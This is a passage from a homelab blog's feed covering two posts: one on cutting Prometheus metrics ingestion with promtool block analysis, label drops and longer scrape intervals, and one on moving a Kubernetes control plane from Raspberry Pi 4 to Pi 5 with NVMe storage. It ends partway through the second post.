</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">jsonData</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">customQueryParameters</span>: <span style="color:#e6db74">&#34;max_source_resolution=5m&#34;</span>
</span></span></code></pre></div><p>And that solved the issue. Using that data source, I&rsquo;m getting data past the
end of the raw resolution data in the TSDB without having to configure anything
else. And because I only very occasionally, and then very intentionally, look
at data older than a year or so, I don&rsquo;t have a problem with having to explicitly
set a different data source.</p>
<p>I would have really liked if this was handled automatically, either by Grafana or
by the Querier, but that just doesn&rsquo;t seem to be how it works.</p>
<h2 id="reducing-prometheus-metrics-ingestion">Reducing Prometheus metrics ingestion</h2>
<p>With the Thanos block viewer on hand, I was finally able to dig a little bit
deeper into why I had to increase the size of the Prometheus volume so often.
Going back to my oldest raw precision block from May 2023, before the k8s migration,
I saw that that 20 day block had a size of almost exactly 1 GiB, with 49.47 MiB
of data per day. Then looking at the most recent 20 day block, from March/April
2025, that block had a size of 13.61 GiB with 688 MiB per day. Here is a table
with a few milestone blocks:</p>
<table>
  <thead>
      <tr>
          <th>End Date</th>
          <th>Duration</th>
          <th>Size</th>
          <th>Daily</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>2023-05-23</td>
          <td>20d</td>
          <td>1 GiB</td>
          <td>49 MiB</td>
      </tr>
      <tr>
          <td>2024-02-02</td>
          <td>20d</td>
          <td>1.25 GiB</td>
          <td>62 MiB</td>
      </tr>
      <tr>
          <td>2024-03-22</td>
          <td>20d</td>
          <td>7.15 GiB</td>
          <td>361 MiB</td>
      </tr>
      <tr>
          <td>2024-09-20</td>
          <td>20d</td>
          <td>8.51 GiB</td>
          <td>430 MiB</td>
      </tr>
      <tr>
          <td>2024-12-31</td>
          <td>20d</td>
          <td>7.84 GiB</td>
          <td>396 MiB</td>
      </tr>
      <tr>
          <td>2025-03-01</td>
          <td>20d</td>
          <td>10.81 GiB</td>
          <td>546 MiB</td>
      </tr>
      <tr>
          <td>2025-04-11</td>
          <td>20d</td>
          <td>13.61 GiB</td>
          <td>688 MiB</td>
      </tr>
      <tr>
          <td>2025-05-01</td>
          <td>7d</td>
          <td>5.10 GiB</td>
          <td>773 MiB</td>
      </tr>
      <tr>
          <td>2025-05-06</td>
          <td>2d</td>
          <td>1.63 GiB</td>
          <td>834 MiB</td>
      </tr>
      <tr>
          <td>2025-05-12</td>
          <td>2d</td>
          <td>1.42 GiB</td>
          <td>724 MiB</td>
      </tr>
      <tr>
          <td>2025-05-16</td>
          <td>2d</td>
          <td>935 MiB</td>
          <td>467 MiB</td>
      </tr>
  </tbody>
</table>
<p>It&rsquo;s pretty clear that the massive jump is coming from the k8s scraping, as I
enabled that in March 2024. For the rest of 2024, the daily intake was reasonably
stable though. But then, starting in 2025, it increases pretty seriously again.
I&rsquo;m pretty sure that&rsquo;s because for most of the latter half of 2024, I was working
on my backup operator implementation, so there wasn&rsquo;t much change in the k8s
cluster, and most apps were still running in the Nomad cluster. Then, starting
in 2025, I began to migrate the rest of the services over, which seemingly increased
the amount of scraped data by a lot. This makes some sense, considering that
some of my largest series are probably the per-container metrics scraped from
the kubelet.</p>
<p>As you can see with the last couple of entries, I made some progress in reducing
the ingest in the last couple of days. I would have loved to show you some
Prometheus ingest plots, bad sadly I only realized that Prometheus provides
ingest metrics too late. &#x1f61e;</p>
<p>For analyzing the data and finding metrics to cut down, I went to looking
directly at the most recent 20 day block with data ending on 2025-04-11. I then
opened it with the <code>promtool</code>. This works without having the block in any special
directory structure, it doesn&rsquo;t need to sit in a Prometheus TSDB. I just downloaded
it from the S3 bucket with s3cmd.</p>
<p>Then I launched <code>promtool</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>promtool tsdb analyze ./ 01J3CD4846QQYQEJ3XN7VZ5NMH/
</span></span></code></pre></div><p>Here, <code>01J3CD4846QQYQEJ3XN7VZ5NMH</code> is the name of the block to be analyzed,
in my case the newest block of full 20 day size. The result looks like this:</p>
<pre tabindex="0"><code>Block ID: 01JRJ8EHHW12VY9SZX5Z45SSQV
Duration: 485h59m59.948s
Total Series: 367092
Label names: 226
Postings (unique label pairs): 20435
Postings entries (total label pairs): 4101019

Label pairs most involved in churning:
105190 service=monitoring-kube-prometheus-kubelet
105190 endpoint=https-metrics
105190 job=kubelet
102018 metrics_path=/metrics/cadvisor
51674 namespace=vault
50203 container=vault
49917 image=docker.io/hashicorp/vault:1.18.5
43187 job=kube-state-metrics
43187 service=monitoring-kube-state-metrics
43187 endpoint=http
35765 service=kubernetes
35765 namespace=default
35765 job=apiserver
35765 endpoint=https
29513 container=kube-state-metrics
22812 namespace=backups
21820 namespace=kube-system
21620 instance=10.8.11.250:8080
21566 instance=10.8.12.213:8080
20230 namespace=rook-ceph

Label names most involved in churning:
201049 __name__
201049 instance
201049 job
194577 service
194053 endpoint
194053 namespace
155528 pod
143798 container
108242 node
105190 metrics_path
102043 id
94318 name
75452 image
46727 device
38871 uid
32460 le
28929 scope
21394 resource
20692 verb
17317 version

Most common label pairs:
145767 endpoint=https-metrics
145767 job=kubelet
145767 service=monitoring-kube-prometheus-kubelet
128459 service=kubernetes
128459 endpoint=https
128459 namespace=default
128459 job=apiserver
123738 metrics_path=/metrics/cadvisor
62525 component=apiserver
57546 service=monitoring-kube-state-metrics
57546 endpoint=http
57546 job=kube-state-metrics
52926 version=v1
52036 namespace=vault
50810 instance=10.86.5.202:6443
50337 container=vault
50020 image=docker.io/hashicorp/vault:1.18.5
49771 namespace=kube-system
39454 container=kube-state-metrics
33481 scope=cluster

Label names with highest cumulative label value length:
636231 id
252234 name
224352 container_id
136756 mountpoint
41804 __name__
25744 uid
23777 pod
14309 owner_name
14243 created_by_name
12707 device
11585 job_name
11220 type
11194 image_id
7383 resource
5504 csi_volume_handle
4755 client
4465 image
4209 pod_ip
4209 ip
4107 interface

Highest cardinality labels:
3814 id
3528 name
3116 container_id
1316 __name__
1185 mountpoint
718 uid
688 pod
566 device
417 pod_ip
417 ip
354 type
349 owner_name
343 created_by_name
317 client
315 resource
280 interface
216 job_name
188 le
182 container
156 kind

Highest cardinality metric names:
31872 etcd_request_duration_seconds_bucket
25920 apiserver_request_duration_seconds_bucket
21736 apiserver_request_sli_duration_seconds_bucket
15232 container_memory_failures_total
10208 apiserver_request_body_size_bytes_bucket
8092 container_blkio_device_usage_total
6968 apiserver_response_sizes_bucket
6734 container_fs_reads_total
6734 container_fs_writes_total
4590 kube_pod_status_phase
4590 kube_pod_status_reason
4036 container_fs_reads_bytes_total
4036 kubernetes_feature_enabled
4036 container_fs_writes_bytes_total
3808 container_memory_kernel_usage
3808 container_memory_failcnt
3808 container_memory_rss
3808 container_memory_max_usage_bytes
3808 container_oom_events_total
3808 container_memory_working_set_bytes
</code></pre><p>Before I go any deeper, one glaring omission in the output that has me a little
bit confused: There is no indicator of the actual number of samples in a metric
or series. So you get a lot of information about labels and series, but nothing
about the samples besides the initial total number of samples in the block.</p>
<p>So let&rsquo;s look at the information we get there. First the typical metadata, like
how long the block is and what the oldest and newest timestamp contained in it
are. One headline number is the count of 367092 series. Let me shortly explain
the difference between a series and a metric. Let&rsquo;s take as an example
<code>container_fs_reads_total</code>. This is a metric - a certain value, gathered from
potentially multiple targets, which has certain labels. A series is then
one explicit permutation of those label&rsquo;s values. For example like this:</p>
<pre tabindex="0"><code>container_fs_reads_total{
    container=&#34;POD&#34;,
    device=&#34;/dev/nvme0n1&#34;,
    endpoint=&#34;https-metrics&#34;,
    instance=&#34;300.300.300.1:10250&#34;,
    job=&#34;kubelet&#34;,
    metrics_path=&#34;/metrics/cadvisor&#34;,
    namespace=&#34;rook-cluster&#34;,
    node=&#34;mynode1&#34;,
    pod=&#34;rook-ceph-osd-2-85b8f48c47-p24kc&#34;,
    prometheus=&#34;monitoring/monitoring-kube-prometheus-prometheus&#34;,
    prometheus_replica=&#34;prometheus-monitoring-kube-prometheus-prometheus-0&#34;,
    service=&#34;monitoring-kube-prometheus-kubelet&#34;
}
</code></pre><p>This is one single series of the <code>container_fs_reads_total</code> metric - one specific
combination of label values. From what I understand, these series are the basis
for Prometheus&rsquo; TSDB storage architecture. Having more or less samples per series
doesn&rsquo;t make much of a difference for Prometheus, but having many more series
per metric tends to get expensive, leading to a cardinality problem for Prometheus
and significantly increasing computational and memory requirements. That&rsquo;s why
the output of <code>promtool</code> fixates on labels and their cardinality, not the number
of samples.</p>
<p>I started out looking at the <code>Label names with highest cumulative label value length</code>
section. If I interpret it right, this is the total length of all values for
that particular label. I then went into Grafana&rsquo;s explore tab and started, well,
exploring. Take the first label, <code>id</code>. Concatenating all values of that label
produces 636k characters. I then chose a random one of the values, which makes
Grafana show you all the metrics using that label+value combination:
<figure>
    <img loading="lazy" src="id-label-values.png"
         alt="A screenshot of Grafana&#39;s explore tab, with the metrics browser open. It shows several selection fields, one of them for labels. The label &#39;id&#39; is chosen, showing that it has 1900 values. A list of those values is also shown, where a random one is currently chosen, starting with &#39;/kubepods.slice/kubepods-burst...&#39;. On the left side is another list with all of the metrics which have that label&#43;value combination. All of them starting with &#39;container_&#39;, and then a lot of different container metrics like &#39;fs_writes_total&#39;."/> <figcaption>
            <p>An example exploration of the &lsquo;id&rsquo; label.</p>
        </figcaption>
</figure>

Note that the label has 1900 values. I then chose a random one of the metrics to
figure out where it&rsquo;s coming from and whether the label is necessary for uniqueness.
Here is an example:</p>
<pre tabindex="0"><code>container_fs_inodes_total{
    container=&#34;install-cni-binaries&#34;,
    device=&#34;/dev/sda2&#34;,
    endpoint=&#34;https-metrics&#34;,

    id=&#34;/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcd726cab_879b_4b26_9916_278220f88d5b.slice/crio-3e855297d10572a5e369c72b4194911528becb34ec905da058ca78df3a3286ca.scope&#34;,

    image=&#34;quay.io/cilium/cilium@sha256:1782794aeac951af139315c10eff34050aa7579c12827ee9ec376bb719b82873&#34;,
    instance=&#34;300.300.300.2:10250&#34;,
    job=&#34;kubelet&#34;,
    metrics_path=&#34;/metrics/cadvisor&#34;,
    name=&#34;k8s_install-cni-binaries_cilium-bs8mb_kube-system_cd726cab-879b-4b26-9916-278220f88d5b_1&#34;,
    namespace=&#34;kube-system&#34;,
    node=&#34;control-plane1&#34;,
    pod=&#34;cilium-bs8mb&#34;,
    prometheus=&#34;monitoring/monitoring-kube-prometheus-prometheus&#34;,
    prometheus_replica=&#34;prometheus-monitoring-kube-prometheus-prometheus-0&#34;,
    service=&#34;monitoring-kube-prometheus-kubelet&#34;
}
</code></pre><p>Just looking at the value for the <code>id</code> label, the problem is immediately clear:
That value is not just extremely long, but it&rsquo;s probably also unique. A
restart of the container might already result in a new one, a restart of the
Pod definitely would. But the value is also unnecessary to guarantee uniqueness
of the series.
That&rsquo;s already guaranteed by the <code>pod</code> plus <code>container</code> labels. And the same is
true for the <code>name</code> label, which has 1902 values and similarly looks like it
might be randomly generated. And it too should be covered by the <code>pod</code> plus
<code>container</code> label combination when it comes to uniqueness. So I decided to
completely drop that particular label. Note the <code>job</code> and the <code>metrics_path</code>
labels. Those indicate where the metric is coming from, namely the kubelet&rsquo;s
cAdvisor scrape. Those can be configured from the kube-prometheus-stack <code>values.yaml</code>.</p>
<p>Worth noting here: The chart has different configs for the different metrics paths
the kubelet offers, hence why looking at the <code>metrics_path</code> label is also important.
I dropped the label via this config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kubelet</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cAdvisorMetricRelabelings</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">labeldrop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">id</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">labeldrop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">name</span>
</span></span></code></pre></div><p>With that, those two labels will be dropped completely before the samples are
ingested. This will not have an immediate effect on the size of new blocks. That&rsquo;s
because we&rsquo;re not gathering fewer samples. We&rsquo;re instead getting fewer series for
all of the cAdvisor metrics. This will have a larger impact once different blocks
are compacted into larger blocks. Because the compaction does not actually remove
any samples, but it is able to deduplicate the series in the index. For example,
with those two labels still in there, I would have larger daily blocks on days
with my regular host or service updates. During both of those maintenance actions,
I&rsquo;m restarting and rescheduling Pods, which would lead to both labels changing -
so I would suddenly have two series in the same block for what is pretty much the
same Pod, because the <code>name</code> and <code>id</code> labels would change after a restart of the
node hosting the Pod.</p>
<p>I went through the rest of the list in the section and applied different actions,
ranging from leaving the label untouched, like the <code>pod</code> label, because it&rsquo;s needed
for uniqueness, to dropping the entire metric using the label, like the <code>mountpoint</code>,
which is only used in the <code>node_filesystem_device_error</code> and <code>node_filesystem_readonly</code>
metrics, neither of which is particularly interesting, so I dropped them in
node_exporter, where they&rsquo;re coming from.</p>
<p>I then went through the <code>Highest cadrinality metric names</code> section, and dropped a
lot of the metrics in there because they just didn&rsquo;t look very interesting.</p>
<p>See, I&rsquo;m perfectly capable of even dropping entire metrics. I&rsquo;m a responsible
adult! &#x1f979;</p>
<p>But one value in the cardinality section deserves a shout out: <code>etcd_request_duration_seconds_bucket</code>.
That metric is just humongous. It produces a total of 45k series. That&rsquo;s how
many unique label combinations it had seen. That comes from the fact that that
metric has labels for 24 histogram buckets times 6 HTTP operations times 317
different Kubernetes object kinds. Wow.</p>
<p>One mistake I made during the configuration that I found just now was that,
as I wrote above, the <code>labeldrop</code> action belongs in the <code>metrics relabelings</code>.
I had put them into the <code>relabelings</code> config, but that does not work.</p>
<p>Those initial fixes and cleanups were done last weekend. I did not see much
drop in the overall size of the gathered metrics, so I dug in a little bit more.
Which was when I saw that all those cAdvisor metrics - which at 196 Pods, and
at least that many containers were definitely contributing the most - were
scraped at 10 second intervals. Which is ridiculous. I increased that to 30s,
via this setting in the kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kubelet</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cAdvisorInterval</span>: <span style="color:#ae81ff">30s</span>
</span></span></code></pre></div><p>Then I had the idea of checking whether any other ServiceMonitors were also
configured with too short of a scrape interval, and I discovered that Ceph was
also doing 10s by default. I was able to change that in the cluster chart like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">30s</span>
</span></span></code></pre></div><p>One thing I found interesting was that dropping the scrape interval for cAdvisor
measurably dropped Prometheus&rsquo; CPU usage as well:
<figure>
    <img loading="lazy" src="prometheus-cpu-drop.png"
         alt="A screenshot of a Grafana time series plot. It shows relatively consistent CPU usage by Prometheus, fluctuating between 0.13 and 0.2, with very occasional spikes to 0.5. The utilization markedly dropped around 21:38, to fluctuate between 0.075 and 0.15."/> <figcaption>
            <p>CPU usage of the Prometheus container. I dropped the cAdvisor scrape interval to 30s around 21:38.</p>
        </figcaption>
</figure>
</p>
<p>Finally a small misguided adventure in metrics reduction. I saw that for the container
metrics, there were entries for each Pod that had <code>POD</code> as their container name.
I surmised that those were the metrics for the container Kubernetes uses to hold
the networking namespace, and I thought I could drop it to reduce ingest a bit
further. But it turned out that yes, this container was actually important,
because it is where all the networking metrics for a Pod are reported. So I had
to revert the drop.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I&rsquo;m just going to stop here, short of the 30 minute reading time limit. &#x1f609;</p>
<p>This project was a very enjoyable success. I of course always welcome any chance
to look at my metrics. And the main goal was reached to its fullest: I&rsquo;ve now
got my metrics in an S3 bucket, and will never have to increase a volume size
again. The downsampling, with somewhat smaller storage requirements after
two years and the ability that with the 1h precision, I can just keep the metrics
indefinitely, was a really nice bonus.
The only thing I would wish for is that the Thanos Queries did automatically
query the next lower precision if it doesn&rsquo;t find any raw precision data.</p>
<p>I was also quite happy that this project had me learn a bit more about how
Prometheus stores its data, and it was another welcome trigger to reduce the
metrics ingestion at least a little bit more.</p>
<p>This project has again shown me that I should get a move on and start
scraping more of my services, instead of mostly scraping Kubernetes, Ceph and my
hosts. I would have really loved to show some plots from scraped Prometheus metrics
on the effects of my metric reduction attempts.</p>
<p>Finally, the Thanos block viewer again demonstrates a principle I read in <a href="http://www.catb.org/esr/writings/taoup/html/">The Art of Unix Programming</a>
many years ago: The Rule of Transparency. It&rsquo;s always a good idea to make your
program&rsquo;s inner workings transparent, and the block viewer was genuinely helpful.</p>
<p>So what&rsquo;s next? I decided to continue going down my &ldquo;smaller project&rdquo; list before
starting something big and completely new again. So the next thing will likely
be the migration from Gitea to Forgejo, simply because that&rsquo;s next on the list
of Homelab things to do.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating my Kubernetes Control Plane to Raspberry Pi 5</title>
      <link>https://blog.mei-home.net/posts/control-plane-pi5/</link>
      <pubDate>Mon, 12 May 2025 00:05:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/control-plane-pi5/</guid>
      <description>Migrating my Kube control plane from Pi 4 to Pi 5</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve had problems with the stability of my Kubernetes control plane ever since
I migrated it to three Raspberry Pi 4 from their temporary home on a beefy x86
server. I will be going into more detail about the problem first, describe the
Pi 5 with NVMe a bit, and then describe the migration itself.</p>
<h2 id="the-problem">The problem</h2>
<p>I&rsquo;ve noted in a couple of the last posts that I&rsquo;ve started seeing instability
in my Kubernetes control plane. The main symptom I saw were my HashiCorp Vault
Pods going down regularly. This was pretty visible because I have not automated
unsealing for Vault, so each time the Pods are restarted, I have to manually
enter the unseal passphrase.</p>
<p>But looking closer at the nodes, all three Raspberry Pi 4 4GB showed a very high
number of restarts for all of their Pods:</p>
<ul>
<li>kube-vip, which I use to provide a virtual IP for the k8s API</li>
<li>kube-apiserver</li>
<li>kube-scheduler</li>
<li>kube-controller-manager</li>
<li>Ceph MON</li>
</ul>
<p>The only component which wasn&rsquo;t regularly restarted was etcd. I tried to dig
really deeply into the issue, but was never able to figure out what really
triggered the restarts. There were
a lot of timeouts in the logs of etcd, kube-apiserver and kube-vip. There are
also some really long multi-minute periods where the etcd cluster is unable to
elect a new leader because they think they&rsquo;re in different terms. In the end it
all always seems to heal itself, I never needed to manually interfere to get the
cluster back. But it didn&rsquo;t look good.</p>
<p>The following two plots illustrate this by showing the <code>apiserver_request_aborts_total</code>
and the <code>etcd_request_errors_total</code> metrics for the period where the Pi 4 were
running the control plane. Both metrics show the rate, summed up over all
label values.</p>
<p>Here is the <code>etcd_request_errors_total</code> metric:
<figure>
    <img loading="lazy" src="etcd-errors.png"
         alt="A screenshot of a Grafana time series plot. It shows the rate of errors in the etcd component of my Kubernetes cluster. The plot goes from April 11th to May 2nd. In the beginning, until April 13th, the plot is straight zero. Starting around 00:00 on the 13th, there are constant errors shown. Only at a rate of, at max, 0.6 per second, and most of the time far below that, but still - there were no errors at all before that. Then there&#39;s a large spike around 12:00 on May 2nd up to a rate of three errors per second, after which the plot goes back to straight zero until the end."/> <figcaption>
            <p>Rate of etcd request errors per second. I finished the migration of the control plane to the Pi 4 around 00:00 on April 13th. I migrated to the Pi 5 on May 1st.</p>
        </figcaption>
</figure>
</p>
<p>While the error rate is not <em>that</em> high, it&rsquo;s pretty clear that it started after
I migrated the control plane to the Pi 4 around April 12th, and vanished
completely after I migrated to the Pi 5.
That large spike on May 1st was when I accidentally bumped the USB-to-SATA adapter
of one of the Pi 4 nodes while another one was already down for replacement. The
single remaining Pi 4 did not take that very well. &#x1f605;</p>
<p>Here is a slightly different view of the aborted apiserver requests during the
same period:
<figure>
    <img loading="lazy" src="apiserver-aborts.png"
         alt="A screenshot of a Grafana time series plot. It shows the rate of aborts in the apiserver component of my Kubernetes cluster. The plot goes from April 11th to May 2nd. In the beginning, until April 11th, the plot is straight zero. Starting around 00:00 on the 11th, there are constant aborts shown. Only at a rate of, at max, 0.1 per second, and most of the time far below that, but still - there were no errors at all before that. Then there&#39;s a large spike around 12:00 on May 2nd up to a rate of 0.25 aborts per second, after which the plot goes back to straight zero until the end."/> <figcaption>
            <p>Rate of apiserver request errors per second. I finished the migration of the control plane to the Pi 4 around 00:00 on April 13th. I migrated to the Pi 5 on May 1st.</p>
        </figcaption>
</figure>
</p>
<p>These two plots already show pretty conclusively that something was wrong after
I migrated the control plane to the Pi 4. And that the migration to the Pi 5
fixed the issue. Here is a final plot, showing the container restarts for the
kube-apiserver, kube-scheduler, kube-controller-manager and Vault:
<figure>
    <img loading="lazy" src="container-restarts.png"
         alt="Another Grafana plot over the same time period. This time it shows the number of container restarts. Again, the plot is mostly flat up to about 00:00 on April 13th. Then it has several periods of 20&#43; restarts, but also some periods with no restarts at all. In the evening of April 19th, there is a couple of large spikes up to 120 restarts. The plot goes flat again after May 1st."/> <figcaption>
            <p>The increase in container restarts over the past hour.</p>
        </figcaption>
</figure>
</p>
<p>It&rsquo;s clear here that the problem was not persistent - there were several days
where no restart at all happened. But the problem was definitely there. One
major problem was that I couldn&rsquo;t really figure out what triggered the restart.
I spend several hours looking at the logs on the control plane hosts, but wasn&rsquo;t
able to identify the real culprit. It looked like at some point etcd just got
overwhelmed, which made both the local apiserver and then finally the kubelet
error out, leading to a round of container restarts.</p>
<p>There were also no clear indications in the machine&rsquo;s metrics. The only thing I
found was some increased IOWAIT time on the CPUs, but at the same time it didn&rsquo;t
look like the IO was actually overwhelmed.</p>
<p>I ended up with the conclusion that I was asking just a bit too much of the poor
Pi 4, and decided that this was the right moment to look at the Pi 5 and its
NVMe-capable PCIe connection.</p>
<h2 id="the-raspberry-pi-5">The Raspberry Pi 5</h2>
<p>When looking for a replacement for the three Raspberry Pi 4, it was pretty clear
that I would be going with the new Pi 5. Most of my Homelab already consists of
Pis, and at least the Pis are supported by an array of mainstream Linux
distros instead of empty promises. The main new feature of the Pi 5 for me is the
fact that it now provides an interface to a PCIe Gen2 x1 lane by default. This
lane can be updated to Gen3, but that&rsquo;s currently not officially supported.
With this PCIe lane comes the ability to connect to an NVMe SSD and even booting
off of it. As I suspected that part of my problem with the Pi 4 control plane
nodes was IO, this made me hopeful that a Pi 5 would be able to cope.</p>
<p>I also made the decision of buying the <a href="https://www.raspberrypi.com/products/raspberry-pi-5/">Pi 5</a>
in the 8 GB variant, as opposed to the 4 GB variant Pi 4 forming my control plane
before. I don&rsquo;t really see a need for the increased RAM right now, there was
still plenty of free RAM on the 4 GB models. But I wanted to invest in a bit of
future proving here.</p>
<p>For the cooling I wanted to go passive again. I had some very bad experience with
a Pi 4 case with an active fan when it was still said that the Pi 4 needed active
cooling, shortly after release. And with my rack sitting right next to my desk,
I want quiet. I bought <a href="https://www.berrybase.de/en/armor-gehaeuse-fuer-raspberry-pi-5-schwarz">this case</a>.
It&rsquo;s very similar to the passive heat sinks I&rsquo;ve been using for the Pi 4.</p>
<p>All the article links in this post will go to <a href="https://www.berrybase.de/en/">berrybase.de</a>,
as that was where I bought the equipment. It&rsquo;s mostly in German, but I&rsquo;m reasonably
sure that you could find the same stuff in many other places.</p>
<p>With cooling covered, I next went hunting for a way to fasten the SSD. A
traditional Pi HAT was off the table, due to the use of the large heat sink.
But after some searching, I found some good reviews of Pimoroni&rsquo;s <a href="https://shop.pimoroni.com/products/nvme-base?variant=41219587178579">NVMe base</a>.
Pimoroni is a pretty trustworthy brand, and they provided some compatibility info
on their page. Plus, they were available in the berrybase shop.</p>
<p>I then had a closer look at Pimoroni&rsquo;s compatibility section for NVMe SSDs,
and finally settled on the <a href="https://europe.kioxia.com/en-europe/personal/ssd/exceria-g2.html">Kioxia Exceria G2</a>.
It was on the compatibility list, was relatively affordable, from a trusted brand
and available at my trusted IT hardware retailer. I bought four of them, three
500 GB models for the new control plane and one 1 TB model, for some future
experiments.</p>
<p>Last but not least, I also had to buy a couple of mounting plates for my
<a href="https://racknex.com/raspberry-pi-rackmount-kit-12x-slot-19-inch-um-sbc-207/">Racknex Pi rack mount</a>.</p>
<p>Overall, this is what one of the new Pis cost me:</p>
<table>
  <thead>
      <tr>
          <th>Item</th>
          <th>Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Raspberry Pi 5 8 GB</td>
          <td>€84,90</td>
      </tr>
      <tr>
          <td>Armor Heat Sink</td>
          <td>€9,90</td>
      </tr>
      <tr>
          <td>Power Supply</td>
          <td>€12,40</td>
      </tr>
      <tr>
          <td>NVMe Base</td>
          <td>€16,50</td>
      </tr>
      <tr>
          <td>500 GB Kioxia NVMe SSD</td>
          <td>€32,90</td>
      </tr>
      <tr>
          <td>Mounting Plate</td>
          <td>€10,80</td>
      </tr>
      <tr>
          <td>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</td>
          <td>&mdash;&mdash;&mdash;</td>
      </tr>
      <tr>
          <td>Total</td>
          <td>€167,40</td>
      </tr>
  </tbody>
</table>
<h3 id="construction">Construction</h3>
<p>With all of things arriving, I could get to my least favorite part of Homelabbing:
Hardware. That was a bit of a challenge in this project, mostly due to the
PCIe flat cable connecting the Pi and the NVMe base. Sadly, I only now realized
that I completely forgot to take pictures of the construction process. So this
is what one of the Pis looks like fully constructed:</p>
<figure>
    <img loading="lazy" src="pi5-finished.jpg"
         alt="A picture of a Raspberry Pi. The Pi 5 itself is covered with a black with a black aluminum heat sink which is about as high as the front IO connectors and covers the entire board, with some cutouts for access to connectors. At the back, a PCIe cable is going from the Pi down to the NVMe base mounted below the Pi. The cables flimsiness and shortness screams &#39;I am a pain to handle&#39;. The entire assembly is mounted onto a sturdy metal piece, with a front part angling up to about two Pis in height, with a large cutout for the Pi&#39;s IO in the front."/> <figcaption>
            <p>A finished Raspberry Pi with connected NVMe all mounted on a Racknex mounting plate. I will leave the tale of the installation of that very short PCIe cable at the back to your nightmares.</p>
        </figcaption>
</figure>

<p>That flat PCIe cable at the back was a bear to install. Getting it fitted to
the NVMe base was not a big problem. But then getting it fitted to the Pi, with
the PCIe base already connected was a nightmare. It was mostly that the cable is
extremely short, and you have to hold up the Pi awkwardly while somehow trying
to connect the cable to the NVMe base.
Pimoroni&rsquo;s install instructions were generally okay, but their proposed order was
to first connect the cable to the base and then connect the Pi side. I found this
entirely impossible. If you look very closely, the heat sink only has a small
cutout to put in the PCIe cable. Doing that while the NVMe base is already
connected proved impossible, at least at my level of dexterity, so I went the
other way around. That was still a pain. If I had bungled the job on one of the
Pis and had to reseat the cable, you might now be reading a post about my imminent
plan to move my entire Homelab to a few dedicated servers at Hetzner. &#x1f62c;</p>
<p>One important part to note: The M2.5 screws which come with the Pimoroni NVMe base
are long enough to connect the base, the Pi and the heat sink. But they turned
out too short to also fit the mounting plate. I had to order an additional set
of M2.5 x 20mm screws. Those were long enough to hold it all together.</p>
<p>Once deployed, this is what the three Pis looked like in the rack:</p>
<figure>
    <img loading="lazy" src="pi5-mounted.jpg"
         alt="A picture of a Racknex Pi mount in a 19 inch rack. There are twelve slots to mount Raspberry Pis, with 8 currently occupied. On the very left are two Pi 4, each occupying one slot. They are each covered by a large read heat sink. Each one is connected to a SATA SSD via a USB-to-SATA adapter. The SSDs are mounted vertically behind the Pis. On the right side, six slots are occupied with three Pi 5. Each of them has a network cable plugged in. They are covered with a black heat sink. There is definitely not a single speck of dust visible in the entire picture. Not one. You definitely cannot see the outline of three more SATA SSDs vertically mounted until recently behind the three Pi 5."/> <figcaption>
            <p>My three Pi 5 mounted in the Racknex mount on the right. The two Pi 4 on the left, connected to their SATA SSDs, are a similar setup as my control plane Pis had previously.</p>
        </figcaption>
</figure>

<p>Can we all agree on ignoring the fact that you can see where the SSDs for the
Pi 4 control nodes were mounted before? Thank you. &#x1f601;</p>
<h3 id="looking-closer-at-the-pi-5">Looking closer at the Pi 5</h3>
<p>Now that the hardware is build, let&rsquo;s take a closer look at the Pi 5. I have a
fourth Pi, with 16 GB of RAM and a 1 TB SSD, for some later project, and did
some initial testing with it. As with the rest of my Pi fleet, I&rsquo;m using Ubuntu
here, in version 24.04, which is the first one compatible with the Pi 5.</p>
<p>I used the <code>ubuntu-24.04.2-preinstalled-server-arm64+raspi.img.xz</code> image from
<a href="https://cdimage.ubuntu.com/ubuntu/releases/24.04.2/release/">the Ubuntu download page</a>.
But before putting it on a USB stick, I wanted to enable the PCIe Gen3 support.
This is not officially supported, but it worked immediately on all three of my
Pi 5 and I haven&rsquo;t had any issues in the week I&rsquo;ve now been running them.
I started by mounting the image locally:</p>
